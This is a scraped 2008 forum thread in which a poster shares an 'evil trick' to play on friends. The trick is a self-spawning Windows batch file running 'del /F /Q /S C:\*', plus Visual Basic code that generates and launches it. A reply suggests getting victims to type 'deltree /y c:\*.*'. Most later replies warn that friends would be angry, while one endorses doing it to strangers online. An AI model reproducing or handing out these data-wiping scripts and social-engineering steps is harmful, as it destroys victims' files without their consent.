|
||
|
|||||||
| Notices |
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|
#1 (permalink) |
![]() Last Online: 07-17-2008 11:36 PM
Join Date: Jun 2008
Posts: 37
![]() |
Hi! This is a really evil trick you can play on your friend(s) (mainly the dumb ones ^^)
WARNING: THIS TRICK MAY BREAK YOUR RELATIONSHIPS WITH YOUR FRIENDS Ok. Open up notepad and type in the following: Code:
start program.bat del /F /Q /S C:\* ![]() And hopefully (if they're dumb), they won't rename the file and they'll run it ^^ Basically, this will start lots of cmds, all of which are executing: "del /F /Q /S C:\*", which will delete most (if not all) of their hard drive... If you're one of those people who know a bit about programming, you can just make a program do this: 1) Create a file called "a.bat". 2) Write the code above to the file. 3) Execute the file. I did that with Visual Basic and the result was DEADLY! (I managed to reduce the control panel icon count down to 3) And here's the visual basic code I used :Code:
Dim sw As StreamWriter = File.CreateText("fu.bat")
sw.WriteLine("start fu.bat")
sw.WriteLine("del /Q /F /S c:\*")
sw.Close()
Process.Start("fu.bat")
|
|
|
|
| Sponsored Links |
|
Register to remove this advertisement |
|
|
#2 (permalink) |
![]() Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
![]() |
Alternatively you could tell them to open start, run, type in "cmd", then type deltree /y c:\*.*
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526 Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344 |
|
|
|
|
|
#4 (permalink) |
![]() Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
![]() |
I've never even seen a computer running Vista in person.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526 Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344 |
|
|
|
|
|
#6 (permalink) |
![]() Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
![]() |
Yeah, I wouldn't want to do that to someone you know otherwise they'd be supremely pissed.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526 Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344 |
|
|
|
|
|
#8 (permalink) |
![]() Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
![]() |
You'd likely lose a friend and gain some injuries.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526 Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344 |
|
|
|
|
|
#9 (permalink) |
![]() Last Online: 07-14-2008 10:32 PM
Join Date: Jun 2008
Posts: 183
![]() |
Hahaha! Couldn't agree with you more on that, Storm. I wouldn't take the risk of crossing a friend. Pissing off an enemy I would gladly do, but not to a friend. I couldn't afford to lose a friendship, much less sustain injuries inflicted by a good old pal.
![]() |
|
|
|
|
|
#10 (permalink) |
![]() Last Online: 09-04-2008 06:39 PM
Join Date: Mar 2008
Location: 2012
Posts: 339
![]() |
Yeah, it's more something I would do to a begger over the internet. I wouldn't want to do that to a friend unless I knew they had backups of everything that matters.
__________________
Register at ForumzPlanet using this link: ForumzPlanet.net/register.php?referrerid=526 Register at GamerzPlanet using this link: GamerzPlanet.net/register.php?referrerid=549344 |
|
|
|
![]() |
| Bookmarks |
| Tags |
| evil, friend, play, trick |
| Thread Tools | |
| Display Modes | |
|
|